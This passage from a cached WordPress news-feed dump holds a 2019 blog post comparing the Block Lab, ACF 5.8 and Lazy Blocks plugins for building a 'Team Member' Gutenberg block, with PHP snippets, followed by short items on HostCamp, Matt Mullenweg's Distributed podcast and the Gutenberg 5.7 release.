block_field( ''picture'' ); ?&gt;"\n alt="&lt;?php block_field( ''first-name'' );?&gt; \n&lt;?php block_field( ''last-name'' );?&gt; " width="150" style="float:left;padding:4px;margin;2px;"/&gt;\n&lt;?php block_field( ''short-bio'' ); ?&gt;&lt;/p&gt;\n\n&lt;p&gt;&lt;em&gt;You can reach &lt;?php block_field( ''first-name'' );?&gt;&lt;/em&gt; \n&lt;br/&gt;via email &lt;span&gt;&lt;a href="mailto:&lt;?php block_field( ''email-address'' ); ?&gt;"&gt;\n&lt;?php block_field( ''email-address'' ); ?&gt;&lt;/a&gt;&lt;/span&gt;\n or &lt;br/&gt;\nvia phone: &lt;span&gt;&lt;?php block_field( ''extension'' ); ?&gt;&lt;/span&gt;&lt;/p&gt;\n</pre>\n\n\n<div class="wp-block-image"><img src="https://lh6.googleusercontent.com/pj0rCDeug3wI8j6NJbIGB03095ZcSRxopKs8Lj_g1ZK3m2cce8GxuK6q55tZvXIkU4YA-qdgwPWirkPzaBV7TbfkMftmWyNmAtHoFKA5KgRcddlW0pF0Em2_eGRzGVgWO6Xt_4on" alt="" width="217" height="402" /></div>\n\n\n\n<p>In the last step, I finished the configuration of this block with the Block Properties </p>\n\n\n\n<ul><li>I set the icon to a person, </li><li>selected the “Layout Elements” as Category and </li><li>added “team member, team” as keywords</li></ul>\n\n\n\n<p>All this is necessary for the Block inserter in the editor. </p>\n\n\n\n<p>Let’s see how it works. </p>\n\n\n\n<p>I added a new Page called <strong>Meet our Block Lab Team</strong> and added the team members, using the Block “Team Member”.</p>\n\n\n\n<div class="wp-block-embed__wrapper">\n\n</div>\n\n\n\n<p>For now, I decided to have all the information filled within the block editor boundaries. During setup of the fieldgroup, I had also the choice to display form controls in the Block Options tab in the sidebar. For the moment, I have determined that’s it’s just personal preference. Once you click outside the block, the form disappears and the block is rendered similar to its frontend representation.</p>\n\n\n\n<img src="https://lh6.googleusercontent.com/49oYuT1N3zL8kgT0ojON3E5s4RgJlS9wJHou2fwgUAGEwaP0LOyuuQ4DZmTm2EUpcHJXRluW_tFlvj_coY62gTteq6ep1kJKTrUTR7lbuV5w276LNlxGJikJwdY51KPvVeyBB5Mh" alt="" />\n\n\n\n<p>Now that I have the block finalized, I can add more team members to the page. I decided, I’d like them in a column block with two columns. </p>\n\n\n\n<img src="https://lh3.googleusercontent.com/XgDmfWQFlv6oN12gTeoZ9wA4JN0lvf_FGeWTLK3RfmWfAKXjQ9E_GOvY5kTKDPJRyAcSP36u1VTMkGI5kwiZ8mUQJnCKQSKYZdE-G6io645EsTyp2V4CfMXrCotH8Och1vGEWUjK" alt="" />\n\n\n\n<p>So far, so good. I was not thrilled that the location of the template points to the theme folder.</p>\n\n\n\n<p>When I want to switch out the theme, I still would like to keep the block and the layout for the block with my site, so I would need to make sure to copy the blocks folder to the new theme’s directory. Another way is outlined in the &nbsp;<a href="https://github.com/getblocklab/block-lab/wiki/3.-Displaying-custom-blocks">documentation for Blocklab on Github</a>. It offers two filters to change the default location of the template: </p>\n\n\n\n<p><em>“To use a different template inside your theme, use the block_lab_override_theme_template( $theme_template ) filter. </em><em>To use a different template outside your theme (for example, in a plugin), use the block_lab_template_path( $template_path ) filter.”</em></p>\n\n\n\n<p>This was fairly easy to set up, even if you are not a PHP developer, you can probably use the one PHP function block-field() and make sure to reference the right field names. </p>\n\n\n\n<p>Block Lab, in essence, provides you with a method to create the fields and configure the block properties in one screen, and then you need to add the corresponding block template to a folder /blocks/ in your theme’s directory.  It&#8217;s fairly straight forward. </p>\n\n\n\n<h2>Creating a Team Block with ACF 5.8 </h2>\n\n\n\n<p>ACF (Advanced Custom Fields) version 5.8 came out with a block builder (only available in the Pro version). For my test I used ACF 5.8 RC 1. The final release is available now.  Elliot Condon is the plugin’s author and the first version was released in 2011. The plugin has grown into a hugely popular developer tool for freelancers and agencies alike and has over 1 million installs. </p>\n\n\n\n<p>Its success and versatility make the creation of the field group a more involved process compared to the other two plugins. The Pro version 5.8 contains the first release of its block building tool.</p>\n\n\n\n<div class="wp-block-embed__wrapper">\n\n</div>\n\n\n\n<p>This is the admin view of the Field group “Team Member”. </p>\n\n\n\n<img src="https://lh5.googleusercontent.com/63PvvK9vJx7T38CSlED8q91thMJh3qToA1bGuKDmBaQQGNsEDndfT4z1KkFFx9fISlt8pnWfq6lrnnoAy11YKmlhXiz-GmydV7sB91YorPT5QGfI46CEWLzY22sfsS-krFn_Aa-1" alt="" />\n\n\n\n<p>Now how do I make this into a block? <a href="https://www.advancedcustomfields.com/resources/blocks/">The documentation</a> is comprehensive enough. &nbsp;Note: In this test I went in a slightly different order… </p>\n\n\n\n<p>I started with the Field Group and I needed to get back to that admin screen after I registered the block (see below) .</p>\n\n\n\n<p>I &nbsp;used two files. First, I needed to register the block in the <em>functions.php</em> of my theme. For the template/block rendering code I used <em>content-block-team-member.php</em> also to be stored in the active theme’s folder. </p>\n\n\n\n<p>You will see how those two fit together in a second. The rest of the work is done by the plugin in the back end.</p>\n\n\n\n<h3>So let’s write the Block Code in PHP</h3>\n\n\n\n<p>The first snippet is the block registration. I gave it a name, title, a description, point to the render template, give it a category, an icon and some keywords, under which the content producer can find the block in the Block Inserter. I scrolled all the way to the end of my theme’s <em>functions.php</em> and added this snippet:</p>\n\n\n<pre class="brush: php; title: ; notranslate">\nfunction register_acf_blocks() {\n   // register a team member block.\n   acf_register_block(array(\n       ''name''              =&gt; ''acf-team-member'',\n       ''title''             =&gt; __(''ACF Team Member''),\n       ''description''       =&gt; __(''A custom team member block created via ACF 5.8''),\n       ''render_template''   =&gt; ''content-block-team-member.php'',\n       ''category''          =&gt; ''formatting'',\n       ''icon''              =&gt; ''admin-comments'',\n       ''keywords''          =&gt; array( ''team member'', ''team'' ),\n   ));\n}\n// Check if function exists and hook into setup.\nif( function_exists(''acf_register_block'') ) {\n   add_action(''acf/init'', ''register_acf_blocks'');\n}\n</pre>\n\n\n<p>This code is straight from the <a href="https://www.advancedcustomfields.com/resources/blocks/">documentation</a> and I just changed a few values. </p>\n\n\n\n<p>In the next section I created the block rendering template. The file name needs to match the “render_template” attribute in the above text, which is “<strong>content-block-team-member.php</strong>”</p>\n\n\n\n<p>I also just followed <a href="https://www.advancedcustomfields.com/resources/blocks/#key-concepts">along ACF’s documentation</a> and only changed a few values and updated the display code. </p>\n\n\n<pre class="brush: php; title: ; notranslate">\n&lt;pre class="wp-block-syntaxhighlighter-code"&gt;&lt;?php\n// create id attribute for specific styling\n$id = ''team-member'' . $block[''id''];\n\n// create align class ("alignwide") from block setting ("wide")\n$align_class = $block[''align''] ? ''align'' . $block[''align''] : '''';\n\n// Load values and asigning defaults for the block fields.\n$short_bio = get_field(''short_bio'') ?: ''the short bio goes here... '';\n$first_name = get_field(''first_name'') ?: ''First Name'';\n$last_name = get_field(''last_name'') ?: ''Last Name'';\n$image = get_field(''picture'');\n$email_address = get_field(''email_address'');\n$extension = get_field(''extension'');\n?&amp;gt;\n\n&lt;div&gt;" class="team-member "&amp;gt;\n       &lt;h2&gt; &lt;/h2&gt;\n   &lt;blockquote class="team-member-blockquote"&gt;\n   &lt;img class="teamphoto"&gt;" alt="" alt="  " width="150" style="float:left;padding:4px;margin;2px;"/&amp;gt;\n       &lt;span class="team-member-short-bio"&gt;&lt;/span&gt;\n       &lt;br /&gt;\n       &lt;span class="team-membe-extension"&gt;&lt;/span&gt;&lt;br /&gt;\n       &lt;span class="team-membe-email-address"&gt;\n       &lt;/span&gt;\n   &lt;/blockquote&gt;\n&lt;/div&gt;\n&lt;/pre&gt;\n</pre>\n\n\n<p>As I started with the Fieldgroup, I needed to go back and make sure that the group is associated with the block I just registered. &nbsp;Below the Fieldgroup screen I created a rule for the Location: It needs to read:  “Show this field group if the <strong>Block</strong> is equal to <strong>ACF Team Member. &nbsp;</strong></p>\n\n\n\n<img src="https://lh6.googleusercontent.com/dNTCzxoXnT8IKlgMBkZKhhcKAyuj6AyZVF5wRHn4rhKGEPt4MTBkmR5rkyxLk_Nl1RZAaiU_sMDplVlmRcVJz7b6xjcbgmEJ0tAJVHllcNzJzEuqUQhUhzwvxFD1-pd8Ahhp28FR" alt="" />\n\n\n\n<p>Now let’s see how this works in the Block editor when I add two members. </p>\n\n\n\n<div class="wp-block-embed__wrapper">\n\n</div>\n\n\n\n<p>It was an interesting experience. You can use the form in the editor section to enter the data. Another option is to enter the data in the form fields available in the the sidebar and you see the block update in real time. You can toggle between the two methods but clicking on the Button “Switch to Edit” or “Switch to Preview” depending which method you are using right now. </p>\n\n\n\n<img src="https://lh6.googleusercontent.com/uihtOmYm4w4yeWo3F116ZTzgr7ESRlgTpOOeOgrI_IWXM4QMJIzs-tjOSnt0o1rnp0EQPIUZE990pMCDvGgjDXS8LhkxBFHAgZnGYZhwYO_DObXU51wuwZcfWOUX_DlMXIJy8Y5E" alt="" />\n\n\n\n<p>The block editor UI works well. It’s worth going through the more elaborate setup and code necessary. </p>\n\n\n\n<h2>Creating a Team Block with Lazy Blocks</h2>\n\n\n\n<p>The third plugin in this test is called “Lazy Blocks” by Nikita of nkdev.info, the same team that also published the <a href="https://wordpress.org/plugins/ghostkit/">GhostKit</a> block collection.</p>\n\n\n\n<p>It not only allows me to store information in post_content but I also get a choice to store it in the post_meta table. </p>\n\n\n\n<p>Here is a video of using the interface to create the fields.</p>\n\n\n\n<div class="wp-block-embed__wrapper">\n\n</div>\n\n\n\n<p>As this admin screen is focused on getting all the information to create the blocks, on the left I created my fields and in the sidebar. &nbsp;I filled in the information needed to register a block with the editor. </p>\n\n\n\n<p>Underneath,  I was  able to add the HTML for frontend and backend. The syntax is even easier than Block Lab, and of course much easier than ACF’s  templating. </p>\n\n\n\n<p>I didn’t need to add any code to my theme’s functions.php nor did I need to create additional files with my template code. </p>\n\n\n\n<p>You can add it all right here, aided by syntax highlighting and merge tags rather than function calls. &nbsp;The <a href="https://lazyblocks.com/documentation/getting-started/">documentation shows multiple ways</a> to write your template code. I am definitely a fan of <a href="http://handlebarsjs.com/">Handlebars (semantic templating)</a> as it is in this context much closer to other systems’ merge tags. </p>\n\n\n\n<img src="https://lh3.googleusercontent.com/n048DkWcRrFC5Z6Y17GgeTYrL_mIMfARYJt71-S7aZx-v6NIkL94QYIsvJr0eWk4pejhgQjBr5-QECpi16qRbQsXOOq_5HoDSN2qGlHejMr7kLfq9qNAeenG7xIjGhnOM6pCcXyp" alt="" />\n\n\n\n<p>I copy/pasted the same code into the “Editor HTML” tab, so I could see the frontend display below the form fields. </p>\n\n\n\n<p>Let’s use it. </p>\n\n\n\n<div class="wp-block-embed__wrapper">\n\n</div>\n\n\n\n<img src="https://lh5.googleusercontent.com/Eqo6z_IfKoAahVP3pNl4TyDc1zAffiOUbLHD1H07DCevQORZkRC-9vyKh6jTFq3djhm840806ktf5PdkrARuCWyRvf0KFCpwHG3JyuHGfEUfMuhMkEkp-SOekYTt9ZDUAsSpS4_O" alt="" />\n\n\n\n<p>This seems to work. It was little bit awkward that the form didn’t disappear when I unselect the block. It takes up a lot of real estate in the editor. Although, I wanted to have the team members in a two-column block, I did not succeed in dragging and dropping the two blocks into a Column Block. I mentioned this in my <a href="https://wordpress.org/support/topic/remove-form-when-block-is-not-selected/">support topic </a>and nK answered: “&#8230;hiding controls when the block is not selected is a good feature, that already added in ACF Blocks and will be added in Lazy Blocks soon.” Here you have it &#8211; all in due time. </p>\n\n\n\n<h2>Conclusion: Complex, Evolved, or Easy. &nbsp;</h2>\n\n\n\n<p><a href="https://www.advancedcustomfields.com/"><strong>ACF 5.8</strong></a> &nbsp;has a very robust block building feature, and every one who has been using the plugin to build sites will be very happy to be able and create dynamic blocks for their customers. It’s well thought through, and developers of all skill sets will get up and running quickly. </p>\n\n\n\n<p>Someone, who is not well versed in PHP will have her fair share of trial and error to get it all going. It will get even more complicated when the requirements for the blocks get more involved and beyond this test’s use case. This is not a tool for WordPress beginners or DIY site implementers who don’t write a lot of code themselves. &nbsp;</p>\n\n\n\n<p>For now, only the ACF 5.8 Pro version comes with the block builder feature. <a href="https://twitter.com/wp_acf/status/1112934364751396865">Condon is contemplating making it a stand alone plugin</a>. (See what the Twitteratti think about the idea… ) </p>\n\n\n\n<p><strong><a href="https://getblocklab.com/">Block Lab </a></strong>is in its early stages of development. It succeeds in abstracting most of the block architecture and reduces the amount of code that needs to be written. The documentation is very helpful. The template is stored in a separate file, and needs to be maintained with the rest of the theme files. If we at my company would use it for any of our projects, we would store the template file with one of our helper plugins, so our customers are able to switch themes without losing the content and display of the blocks built with Block Lab. </p>\n\n\n\n<p>The Pro version boasts additional features, such as repeater fields, import/export of blocks, user object fields, map field and many more block features. </p>\n\n\n\n<p>XWP is an agency working with enterprise clients on the WordPress.com VIP hosting and other corporations. Their team members are contributing to other big ideas in the WordPress space,<a href="https://xwp.co/project/customizer/"> including the Customizer</a>, &nbsp;<a href="https://xwp.co/project/google-amp/">AMP</a> and <a href="https://xwp.co/project/tide/">Tide</a>. I expect the plugin to stay around and grow with Gutenberg Phase 2 into a robust system for site implementers, agencies, and theme developers. </p>\n\n\n\n<p><strong><a href="https://lazyblocks.com/">Lazy Blocks</a></strong><a href="https://lazyblocks.com/"> </a>is a delight to set up and as mentioned, I am a fan of the <a href="https://handlebarsjs.com/">Handelbars</a> templating syntax. It’s easy to learn even for beginners, and with a little practice, a site owner would be able to create specific Gutenberg blocks for their site. The block handling in the editor although functioning, is a little clunky, as the display doesn’t switch between block select state and unselect state at the moment. </p>\n\n\n\n<p>If there is a requirement of having additional fields for a page or a section of a post, Lazy Blocks is a great tool to prototype and get quickly from idea to proof of concept.</p>\n\n\n\n<p>The only caveat: I was not able to find out who the people are behind <em>nkdev.info</em> and the name Nikita. The website only reveals that it is a young company but nothing more. If you use the plugin, make sure you have Plan B in place just in case the developers abandon the plugin before it takes off. </p>\n\n\n\n<p>ACF 5.8 is quite complex; Block Lab is a very flexible and only semi-complex; and Lazy Blocks is adequately named and the easiest to use. None of them lets you get away without writing code, as each block needs some display output in HTML. </p>\n\n\n\n<p>Let me know what you think about these three block generating plugins. Also, if you found another plugin that allows you to build blocks without getting into Javascript, I want to know about it! Please share your thoughts and discoveries in the comments! </p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 16 May 2019 22:42:47 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:18:"Birgit Pauli-Haack";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:19;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:78:"WPTavern: HostCamp: An Unconference For Advancing the WordPress Infrastructure";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89739";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:88:"https://wptavern.com/hostcamp-an-unconference-for-advancing-the-wordpress-infrastructure";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:1922:"<p><a href="https://hostcamp.org/">HostCamp</a> is a small, semi-informal, invitation-only, event with an <a href="http://unconference.net/unconferencing-how-to-prepare-to-attend-an-unconference/">unconference style</a> that is bringing leaders together from within the hosting industry to discuss and share ideas on how to advance the WordPress infrastructure across the web. </p>\n\n\n\n<p>The organizing team is comprised of, Jonathan Wold, Ecosystem Consultant, Formerly VP of Strategy at XWP, Mile Rosu, Co-founder and CEO of Presslabs, Mihai Grescenko, Head of Design at Desero, Anna Maria Radu, Event producer for DigiTales, and Andreea Oproiu, Communication and PR specialist for DigiTales.</p>\n\n\n\n<p><a href="https://hostcamp.org/program/">Speakers</a> will present on a variety of topics including, malware, ethics in WordPress hosting, PHP versions, portability, and more. <a href="https://www.betahaus.com/">Betahaus</a>, a network and co-working facility in Berlin, Germany, is hosting the event. </p>\n\n\n\n<div class="wp-block-image"><img />Betahaus Facility in Berlin, Germany</div>\n\n\n\n<p>Rosu describes the unconference as, &#8220;A launchpad for innovations in the hosting industry where opportunities in WordPress infrastructure are encouraged and promoted.&#8221;</p>\n\n\n\n<p>If you&#8217;re interested in attending, there is an application form near the bottom of the <a href="https://hostcamp.org/">HostCamp site</a> that is available until June 1st. Tickets are <a href="https://www.eventbrite.com/e/hostcamp-10-tickets-60401507535">on sale now</a><a href="https://www.eventbrite.com/e/hostcamp-10-tickets-60401507535"></a> for €200 or $223.47. Refunds are available if you contact the organizing team 30 days prior to the event. </p>\n\n\n\n<p>It should be noted that <a href="https://2019.europe.wordcamp.org/">WordCamp EU</a> is taking place in Berlin, Germany, as well and begins a day after HostCamp. </p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 16 May 2019 21:09:33 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:20;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:74:"WPTavern: Matt Mullenweg Launches New Blog and Podcast on Distributed Work";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89755";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:85:"https://wptavern.com/matt-mullenweg-launches-new-blog-and-podcast-on-distributed-work";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:4506:"<img />photo credit: <a href="https://stocksnap.io/photo/I16C0GFHHM">Min An</a>\n\n\n\n<p><a href="https://automattic.com/">Automattic</a> CEO Matt Mullenweg has launched a new blog and podcast at <a href="https://distributed.blog/">Distributed.blog</a> where he will be sharing what he has learned over the past 15 years of managing a distributed workforce. In 2019, Automattic now employs more than 900 people from 68 countries who have all worked in a distributed fashion since day one. </p>\n\n\n\n<p>&#8220;With the Distributed podcast I wanted to take a closer look at how some of the most innovative companies and brilliant minds think about the future of work,&#8221; Mullenweg said. &#8220;Not just the binary questions of &#8216;remote work&#8217; vs. &#8216;office work,&#8217; but the wider spectrum of what’s possible and why it matters. How can we work better and smarter in the decades to come—and what’s the moral imperative driving our desire to change?&#8221;&nbsp;</p>\n\n\n\n<p>The first <a href="https://distributed.blog/podcast/">episode</a> of the podcast features <a rel="noreferrer noopener" href="https://www.upwork.com/" target="_blank">Upwork</a> CEO <a rel="noreferrer noopener" href="https://twitter.com/skasriel" target="_blank">Stephane Kasriel</a>, who  is deeply embedded in the labor market for remote work. His company offers a global platform for connecting businesses with freelancers. Upwork went public in 2018 and is expected to do more than $1.7 billion in business this year. Kasriel has a wealth of knowledge to share from his experience managing more than 1,100 remote freelancers in 500 cities, in addition to 400 on-site employees.  </p>\n\n\n\n<p>&#8220;Our mission at this company is to create economic opportunities for people to have better lives, and the way we measure that is how much money goes into people&#8217;s pockets,&#8221; Kasriel said.</p>\n\n\n\n<p>Both Mullenweg and Kasriel are passionate about seeing more companies embrace remote work and the first part of the podcast goes deeper into what is currently broken about work. Those living in big cities are often paid well for their talents and expertise but will spend a large portion of that money on the cost of living. Kasriel said he believes Upwork can be a &#8220;driving force in creating a better future&#8221; by championing remote work as the economic catalyst for improving working conditions across the globe.</p>\n\n\n\n<p>&#8220;This distributed-company movement is the awakening of the tech industry [to the reality] that we are part of the problem,&#8221; Kasriel said. &#8220;Part of the reason why jobs have been destroyed in plenty of places in the country while all the new jobs were created in a small number of areas is because of tech.&#8221;</p>\n\n\n\n<p>For those who are curious about how CEOs and managers make distributed work a success, the first episode includes discussions on some of the more practical issues of managing a remote work force. Mullenweg and Kasriel discuss the challenges of working across timezones, strategies for improving communication and  preventing employees from feeling a sense of isolation, and managing productivity and performance.</p>\n\n\n\n<p>The topics included in the episode are even applicable for smaller distributed companies that are just starting out. Kasriel shared tips on establishing a strong culture of employee satisfaction for both on-site employees and those working remotely, navigating conflict, integrating new employees into remote culture, and allowing people to &#8220;delocate&#8221; from on-site work. </p>\n\n\n\n<p>After listening to this episode, I found that Mullenweg and Kasriel presented a compelling case that distributed work is not just a buzzword in the tech industry.  It is actually a movement with a powerful economic impact that is poised to change the world. Remote work also has the added benefit of creating opportunities for people who have a difficult time participating in the traditional labor market, effectively increasing the diversity of a company&#8217;s employees by offering a more inclusive model for working.</p>\n\n\n\n<p>The podcast is produced by Mark Armstrong and the team at <a href="https://www.chartsandleisure.com/">Charts &amp; Leisure</a>.  There&#8217;s a lot of valuable information efficiently packed into just 37 minutes. If you manage a distributed team or are part of one, this is a high quality new show to <a href="https://distributed.blog/podcast/">add to your subscriptions</a>. </p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 16 May 2019 18:14:34 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:21;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:41:"Matt: Introducing the Distributed Podcast";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:22:"https://ma.tt/?p=49550";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:58:"https://ma.tt/2019/05/introducing-the-distributed-podcast/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:1156:"<a href="https://ma.tt/feed/distributed.blog" target="_blank" rel="noreferrer noopener"><img /></a>\n\n\n\n<p>I’ve been meeting with some brilliant people for <em><a href="https://distributed.blog">Distributed</a></em>, my new podcast dedicated to exploring the future of work. The first episode is a conversation with <a href="https://twitter.com/skasriel">Stephane Kasriel</a>, CEO of <a href="https://www.upwork.com/">Upwork</a>, about how they built a distributed culture, and how flexible work will shape the future of the global economy. </p>\n\n\n\n<p>Unlike <a href="https://automattic.com/">Automattic</a>, Upwork does have an office in Silicon Valley (albeit one with a remote receptionist!). It was interesting to hear how Stephane’s teams balance in-person culture with inclusiveness for all employees, no matter where they live. Read more about Stephane’s work at <a href="https://distributed.blog">Distributed.blog</a>, and subscribe at <a href="https://podcasts.apple.com/us/podcast/distributed-with-matt-mullenweg/id1463243282">Apple Podcasts</a>, or <a href="https://distributed.blog/podcast/">wherever you listen to podcasts</a>. <br /></p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 16 May 2019 14:59:51 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:4:"Matt";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:22;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:76:"WPTavern: Gutenberg 5.7 Adds New Block Appender for Group and Columns Blocks";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89680";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:87:"https://wptavern.com/gutenberg-5-7-adds-new-block-appender-for-group-and-columns-blocks";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:3366:"<p>Today&#8217;s release of Gutenberg brings a major improvement to the usability of the Group block. In previous versions of the editor, it wasn&#8217;t easy to see if a block had been inserted as a child block, especially since the default behavior was to insert an empty paragraph block. <a href="https://make.wordpress.org/core/2019/05/15/whats-new-in-gutenberg-15th-may/" rel="noopener noreferrer" target="_blank">Gutenberg 5.7</a> brings more clarity to the UI for Group blocks by displaying the new block appender as the default state when no inner blocks are detected. (The &#8220;appender&#8221; is the fancy name for the button with the plus sign inside it that opens the UI for inserting a new block.) </p>\n<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2019/05/Screen-Shot-2019-05-15-at-5.53.03-PM.png?ssl=1"><img /></a></p>\n<p>The Columns block has also been updated to add the new block appender, and this release adds support for setting column widths. The inflexibility of the Columns block has been a frustration for users since it was introduced, but this release makes progress on one of the most common requests. Users can now set a percentage width for the columns in the block settings. The UI for this is a bit clunky, but a more interactive, draggable column resizer handle is <a href="https://github.com/WordPress/gutenberg/issues/15659" rel="noopener noreferrer" target="_blank">coming in a future release</a>. Future iterations may also include &#8220;quick-select&#8221; template options for users to select from when setting up their columns.</p>\n<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2019/05/Screen-Shot-2019-05-15-at-9.42.51-PM.png?ssl=1"><img /></a></p>\n<p>Other new features in this release include support for <a href="https://github.com/WordPress/gutenberg/pull/14627" rel="noopener noreferrer" target="_blank">showing post content or an excerpt in the Latest Posts block</a> and support for <a href="https://github.com/WordPress/gutenberg/pull/15409" rel="noopener noreferrer" target="_blank">header and footer toggles in the Table block</a>.</p>\n<p>One handy little addition to Gutenberg 5.7 is the ability to <a href="https://github.com/WordPress/gutenberg/pull/14983" rel="noopener noreferrer" target="_blank">update images using drag &#038; drop</a>. Users can now drag an image onto an image block that already contains an image. The image will be uploaded and will replace the previous one, saving users many clicks in the process of changing an image. Future updates may also add the same behavior to the audio, video, file, and Media &#038; Text blocks.</p>\n<p>Gutenberg 5.7 includes dozens of bug fixes and accessibility improvements, with several suggestions that originated from WPCampus&#8217; accessibility audit. It also brings a significant boost in performance with a 14% faster loading time than the previous version.<br />\n<br />\nThe project&#8217;s documentation has <a href="https://developer.wordpress.org/block-editor/" rel="noopener noreferrer" target="_blank">a new home on WordPress DevHub</a> and has been reorganized for better navigation.</p>\n<p>A list of all the changes in the 5.7 release is available in the <a href="https://make.wordpress.org/core/2019/05/15/whats-new-in-gutenberg-15th-may/" rel="noopener noreferrer" target="_blank">release post</a>.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 16 May 2019 04:44:20 